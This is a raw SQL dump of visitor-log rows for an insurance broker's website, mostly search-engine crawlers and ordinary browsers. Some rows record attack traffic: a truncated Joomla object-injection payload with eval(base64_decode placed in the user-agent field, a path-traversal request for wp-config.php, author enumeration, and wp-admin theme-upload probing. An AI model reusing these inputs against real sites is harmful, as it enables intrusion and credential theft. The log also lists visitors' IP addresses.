http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(8583,'0b_667fd3cb2ef003175e0aeed6d3b50894','1458823046','51.255.162.165','165.ip-51-255-162.eu','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(8586,'0b_667fd3cb2ef003175e0aeed6d3b50894','1458823051','51.255.162.165','165.ip-51-255-162.eu','/products.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(8588,'0b_667fd3cb2ef003175e0aeed6d3b50894','1458823058','51.255.162.165','165.ip-51-255-162.eu','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(8589,'0b_667fd3cb2ef003175e0aeed6d3b50894','1458823064','51.255.162.165','165.ip-51-255-162.eu','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(8591,'0b_667fd3cb2ef003175e0aeed6d3b50894','1458823070','51.255.162.165','165.ip-51-255-162.eu','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(8594,'0b_667fd3cb2ef003175e0aeed6d3b50894','1458823073','51.255.162.165','165.ip-51-255-162.eu','/SSO/235_39.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(8597,'0b_667fd3cb2ef003175e0aeed6d3b50894','1458823077','51.255.162.165','165.ip-51-255-162.eu','/SSO/235_42.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(8598,'0b_667fd3cb2ef003175e0aeed6d3b50894','1458823080','51.255.162.165','165.ip-51-255-162.eu','/products.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(8600,'0b_b4e54f0f06f9f61dc452e7dd5533f943','1458823508','180.76.15.31','baiduspider-180-76-15-31.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(8603,'0b_fbf148a96a62ca66de582070abce8952','1458825780','75.109.171.215','75-109-171-215.amrlcmtk01.com.dyn.suddenlink.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win10','Chrome 49','us','1600 x 900','','','','','','0','0',0),(8606,'0b_fbf148a96a62ca66de582070abce8952','1458825782','75.109.171.215','75-109-171-215.amrlcmtk01.com.dyn.suddenlink.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1600 x 900','','','','','','0','0',0),(8609,'0b_fbf148a96a62ca66de582070abce8952','1458825806','75.109.171.215','75-109-171-215.amrlcmtk01.com.dyn.suddenlink.net','/contact/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win10','Chrome 49','us','1600 x 900','','','','','','0','0',0),(8612,'0b_fbf148a96a62ca66de582070abce8952','1458825828','75.109.171.215','75-109-171-215.amrlcmtk01.com.dyn.suddenlink.net','/forms/','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/contact/','',0,'Win10','Chrome 49','us','1600 x 900','','','','','','0','51',0),(8613,'0b_c2bd9ca3f8427a3658e5fe1d03f96e2a','1458826277','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8616,'0b_71160420768418178917fa73ecae9593','1458827727','66.249.73.194','crawl-66-249-73-194.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(8619,'0b_e0d301425168160438f6b3616cc63772','1458828171','40.77.167.44','msnbot-40-77-167-44.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8621,'0b_05249a5fd14e81be62ab7ad9100a6512','1458830373','136.243.48.82','static.82.48.243.136.clients.your-server.de','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36','','',0,'Linux','Chrome 37','de','','','','','','','0','0',0),(8622,'0b_d12b243dde8080747d4be6079c5d12a2','1458830635','70.32.34.122','70.32.34.122','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'WinVista','Firefox 15','ua','','','','','','','0','0',0),(8625,'0b_f2ad7e09a54e5d19d9052ad425759f27','1458830877','141.8.143.235','spider-141-8-143-235.yandex.com','/robots.txt','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','','','','Yandex','','','','0','0',0),(8628,'0b_45eeccab23593815e99e82cd4e36e066','1458831514','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8631,'0b_1a5c55b8f5d4d8e9a1fab48f6b667c92','1458831815','91.210.146.14','14.146.dynamic.pppoe.fregat.ua','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.0; WOW64; rv:15.0) Gecko/20121011 Firefox/15.0.2','','',0,'WinVista x64','Firefox 15','ru','','','','','','','0','0',0),(8633,'0b_f9d27f57dbff8397fbe7652182ed418c','1458831977','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8636,'0b_f9d27f57dbff8397fbe7652182ed418c','1458831980','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8639,'0b_f9d27f57dbff8397fbe7652182ed418c','1458831982','184.154.139.23','placeholder.sitelock.com','/carriers/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8642,'0b_f9d27f57dbff8397fbe7652182ed418c','1458831984','184.154.139.23','placeholder.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8645,'0b_f9d27f57dbff8397fbe7652182ed418c','1458831987','184.154.139.23','placeholder.sitelock.com','/agent-tools/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8648,'0b_f9d27f57dbff8397fbe7652182ed418c','1458831989','184.154.139.23','placeholder.sitelock.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8649,'0b_f9d27f57dbff8397fbe7652182ed418c','1458831992','184.154.139.23','placeholder.sitelock.com','/agent-tools/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8651,'0b_6087affdcba4197dada335015398f4ea','1458831994','184.154.139.23','placeholder.sitelock.com','/?p=185','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','0','0',0),(8654,'0b_f9d27f57dbff8397fbe7652182ed418c','1458831994','184.154.139.23','placeholder.sitelock.com','/carriers/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(8655,'0b_bb4cb3f1393551173a6efb1dc7152afb','1458834604','68.180.230.123','b115363.yse.yahoo.net','/carriers/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8657,'0b_632ac18db92e886fbaf3b30c9605ad80','1458836421','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8658,'0b_be9f4d51c7615892bacc6834309a2146','1458837673','173.79.124.58','pool-173-79-124-58.washdc.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','','Google','','','','','0','0',0),(8660,'0b_be9f4d51c7615892bacc6834309a2146','1458837676','173.79.124.58','pool-173-79-124-58.washdc.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8663,'0b_9aea4b21256704863efa5f153cde7251','1458837676','173.79.124.58','pool-173-79-124-58.washdc.fios.verizon.net','/','Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0 (Chrome)','','',0,'Linux','Firefox 10','us','','','','','','','0','0',0),(8666,'0b_1866b320df589bc93ed33f59ac977b04','1458838865','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(8669,'0b_f018543cce6c3047b1b58e1eac230edd','1458840473','93.54.97.78','93-54-97-78.ip129.fastwebnet.it','/','}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:2:\\\"fc\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:8:\\\"feed_url\\\";s:1182:\\\"eval(base64_decode','','',0,'','','it','','','Feed Reader','feed reader','','','0','0',0),(8672,'0b_a1a7baea219b70dbc0e3886e9999590e','1458842530','208.180.146.72','208-180-146-72.parmcmtc01.com.sta.suddenlink.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=empire+insurance+brokers&form=PRDLCS&mkt=en-us&refig=22cfabf4379040abbfc9a44811a53e1e&pq=empire+insurance+brokers&sc=3-24&sp=-1&qs=n&sk=&ghc=1&cvid=22cfabf4379040abbfc9a44811a53e1e','empire insurance brokers',1,'Win7 x64','IE 11','us','','Bing','','','','','0','0',0),(8673,'0b_a1a7baea219b70dbc0e3886e9999590e','1458842530','208.180.146.72','208-180-146-72.parmcmtc01.com.sta.suddenlink.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.bing.com/search?q=empire+insurance+brokers&form=PRDLCS&mkt=en-us&refig=22cfabf4379040abbfc9a44811a53e1e&pq=empire+insurance+brokers&sc=3-24&sp=-1&qs=n&sk=&ghc=1&cvid=22cfabf4379040abbfc9a44811a53e1e','empire insurance brokers',1,'Win7 x64','IE 11','us','','Bing','','','','','0','0',0),(8676,'0b_a1a7baea219b70dbc0e3886e9999590e','1458842533','208.180.146.72','208-180-146-72.parmcmtc01.com.sta.suddenlink.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(8678,'0b_5324c36bf33de4b8f0069ea4a30b15bf','1458849613','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8679,'0b_13d538a707cf9c1b2e965454a78aa718','1458850378','100.43.81.152','spider-100-43-81-152.yandex.com','/SSO/235_42.html','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(8682,'0b_062202ffad58cc440501d6d099a2523e','1458851016','180.76.15.150','baiduspider-180-76-15-150.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(8684,'0b_fba42248f48582d9261e162a23d95b41','1458855481','141.8.143.242','spider-141-8-143-242.yandex.com','/quotes.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(8685,'0b_c2bd509480f03cbe28541ab304c1e530','1458856709','173.68.18.130','static-173-68-18-130.nycmny.fios.verizon.net','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Linux','Chrome 47','us','','','Unknown Spider','','','','0','0',0),(8687,'0b_c2bd509480f03cbe28541ab304c1e530','1458856719','173.68.18.130','static-173-68-18-130.nycmny.fios.verizon.net','/about-us','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Linux','Chrome 47','us','','','Unknown Spider','','','','0','0',0),(8690,'0b_c2bd509480f03cbe28541ab304c1e530','1458856719','173.68.18.130','static-173-68-18-130.nycmny.fios.verizon.net','/about-us/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Linux','Chrome 47','us','','','Unknown Spider','','','','0','0',0),(8693,'0b_c2bd509480f03cbe28541ab304c1e530','1458856721','173.68.18.130','static-173-68-18-130.nycmny.fios.verizon.net','/contact','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Linux','Chrome 47','us','','','Unknown Spider','','','','0','0',0),(8696,'0b_c2bd509480f03cbe28541ab304c1e530','1458856722','173.68.18.130','static-173-68-18-130.nycmny.fios.verizon.net','/contact/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Linux','Chrome 47','us','','','Unknown Spider','','','','0','0',0),(8699,'0b_c2bd509480f03cbe28541ab304c1e530','1458856723','173.68.18.130','static-173-68-18-130.nycmny.fios.verizon.net','/about-us/meet-the-eib-team','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Linux','Chrome 47','us','','','Unknown Spider','','','','0','0',0),(8700,'0b_c2bd509480f03cbe28541ab304c1e530','1458856723','173.68.18.130','static-173-68-18-130.nycmny.fios.verizon.net','/meet-the-eib-team/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Linux','Chrome 47','us','','','Unknown Spider','','','','0','0',0),(8702,'0b_c2bd509480f03cbe28541ab304c1e530','1458856724','173.68.18.130','static-173-68-18-130.nycmny.fios.verizon.net','/contact/feed','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Linux','Chrome 47','us','','','Unknown Spider','','','','0','0',0),(8705,'0b_c2bd509480f03cbe28541ab304c1e530','1458856725','173.68.18.130','static-173-68-18-130.nycmny.fios.verizon.net','/contact/feed/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Linux','Chrome 47','us','','','Unknown Spider','','','','0','0',0),(8706,'0b_c2bd509480f03cbe28541ab304c1e530','1458856725','173.68.18.130','static-173-68-18-130.nycmny.fios.verizon.net','/meet-the-eib-team/feed','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Linux','Chrome 47','us','','','Unknown Spider','','','','0','0',0),(8709,'0b_c2bd509480f03cbe28541ab304c1e530','1458856726','173.68.18.130','static-173-68-18-130.nycmny.fios.verizon.net','/meet-the-eib-team/feed/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Linux','Chrome 47','us','','','Unknown Spider','','','','0','0',0),(8711,'0b_c2bd509480f03cbe28541ab304c1e530','1458856726','173.68.18.130','static-173-68-18-130.nycmny.fios.verizon.net','/meet-the-eib-team','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Linux','Chrome 47','us','','','Unknown Spider','','','','0','0',0),(8712,'0b_c2bd509480f03cbe28541ab304c1e530','1458856727','173.68.18.130','static-173-68-18-130.nycmny.fios.verizon.net','/meet-the-eib-team/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36','','',0,'Linux','Chrome 47','us','','','Unknown Spider','','','','0','0',0),(8714,'0b_87b3242106e3ef5275ded595de82e3a3','1458857429','207.46.13.1','msnbot-207-46-13-1.search.msn.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8717,'0b_3245349d005576ca9c53ed738dd70714','1458860124','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(8720,'0b_3465dc44317c22bb034c496421d81b6c','1458860680','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8723,'0b_9f8031cc3184d659d292976be1ba740c','1458861470','100.43.91.1','spider-100-43-91-1.yandex.com','/companylinks.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(8726,'0b_8bdd8b46025234b17b87d519832387df','1458861856','192.187.114.10','code-mode.cakestandchar.net','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(8727,'0b_8bdd8b46025234b17b87d519832387df','1458861857','192.187.114.10','code-mode.cakestandchar.net','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(8730,'0b_8bdd8b46025234b17b87d519832387df','1458861858','192.187.114.10','code-mode.cakestandchar.net','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(8733,'0b_1e87583372a8ab50ad2db0ad91bcabaa','1458863202','93.153.41.222','93-153-41-222.tmcz.cz','/','}__test|O:21:\\\"JDatabaseDriverMysqli\\\":3:{s:2:\\\"fc\\\";O:17:\\\"JSimplepieFactory\\\":0:{}s:21:\\\"\\\\0\\\\0\\\\0disconnectHandlers\\\";a:1:{i:0;a:2:{i:0;O:9:\\\"SimplePie\\\":5:{s:8:\\\"sanitize\\\";O:20:\\\"JDatabaseDriverMysql\\\":0:{}s:8:\\\"feed_url\\\";s:1182:\\\"eval(base64_decode','','',0,'','','cz','','','Feed Reader','feed reader','','','0','0',0),(8736,'0b_be9dd1abedf6de589f0ae2cd72c536a9','1458863326','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8739,'0b_1dfc7acbb29b3525065b9eabe7aee94a','1458866443','208.115.111.66','208-115-111-66-reverse.wowrack.com','/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(8742,'0b_cde8557eb5c6bbda49eb87a379a3c020','1458867151','207.46.13.1','msnbot-207-46-13-1.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(8745,'0b_2d0df05e0d040c178d4a7158982dcd19','1458867248','5.153.233.130','5.153.233.130','/?author=1','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(8747,'0b_2d0df05e0d040c178d4a7158982dcd19','1458867258','5.153.233.130','5.153.233.130','/author/admin/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(8748,'0b_2d0df05e0d040c178d4a7158982dcd19','1458867268','5.153.233.130','5.153.233.130','/?author=2','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)','','',0,'Win7','IE 9','','','','','','','','0','0',0),(8750,'0b_c7578b7859b42b32cb8853d812c17c60','1458869075','100.43.81.146','spider-100-43-81-146.yandex.com','/companylinks.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','tr','','','Yandex','','','','0','0',0),(8751,'0b_0cb339f8ff95f8aba2c9b179498cbb1c','1458869911','66.249.73.187','crawl-66-249-73-187.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(8753,'0b_e2b3c1d1641abbee8f1d570d223dac5f','1458869913','141.8.143.195','spider-141-8-143-195.yandex.com','/companylinks.htm','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(8756,'0b_fc80b773dabf65bdc31591131e32bc99','1458870465','100.43.91.26','spider-100-43-91-26.yandex.com','/contact/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(8759,'0b_8f9877f042011f9ab0db1af15034232f','1458871614','207.46.13.1','msnbot-207-46-13-1.search.msn.com','/about-us/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(8762,'0b_ddf999e131e79bb99af32816fe91db33','1458875505','52.73.242.178','ec2-52-73-242-178.compute-1.amazonaws.com','/','python-requests/2.8.1','','',0,'','','','','','python','','','','0','0',0),(8763,'0b_b17ca61bedcf6904f6fb083eb482be1b','1458876308','66.249.73.187','crawl-66-249-73-187.googlebot.com','/carriers/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(8766,'0b_1a17b3cc0a19bacce5069cf8fe3ad5be','1458876712','80.255.192.237','80.255.192.237','/?mdocs-img-preview=../../../wp-config.php','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8','','',0,'MacOSX','Firefox 3','us','','','','','','','3','0',0),(8768,'0b_5484344eba19431066b1fdf9dfe10646','1458876996','66.249.73.187','crawl-66-249-73-187.googlebot.com','/case-status/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(8771,'0b_091f4fd292b42e3eb505ba01e419203b','1458878607','94.242.239.162','ip-static-94-242-239-162.server.lu','/wp-admin/theme-install.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','lu','','','','','','','3','0',0),(8774,'0b_091f4fd292b42e3eb505ba01e419203b','1458878610','94.242.239.162','ip-static-94-242-239-162.server.lu','/wp-admin/theme-install.php?tab=upload','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','lu','','','','','','','3','0',0),(8775,'0b_65e470fd358738368e42aa8eff500105','1458879322','66.249.73.169','crawl-66-249-73-169.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(8778,'0b_65e470fd358738368e42aa8eff500105','1458879323','66.249.73.169','crawl-66-249-73-169.googlebot.com','/igo/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(8781,'0b_f114c3cd3222965caae3d0b641302582','1458880368','107.173.201.203','107-173-201-203-host.colocrossing.com','/register/','Mozilla/5.0 (X11; CrOS x86_64 6310.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.96 Safari/537.36','http://www.empireins.com/','',0,'X11','Chrome 39','us','','','','','','','0','0',0),(8784,'0b_ea79344cf11cb0e2f4743fcf42e099f1','1458881365','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8787,'0b_ea79344cf11cb0e2f4743fcf42e099f1','1458881366','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8790,'0b_ea79344cf11cb0e2f4743fcf42e099f1','1458881367','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8793,'0b_d39e7c7bb5296815c3fc355b3979f6be','1458881370','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/register/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8795,'0b_d39e7c7bb5296815c3fc355b3979f6be','1458881371','40.77.167.88','msnbot-40-77-167-88.search.msn.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; bingbot/2.0; 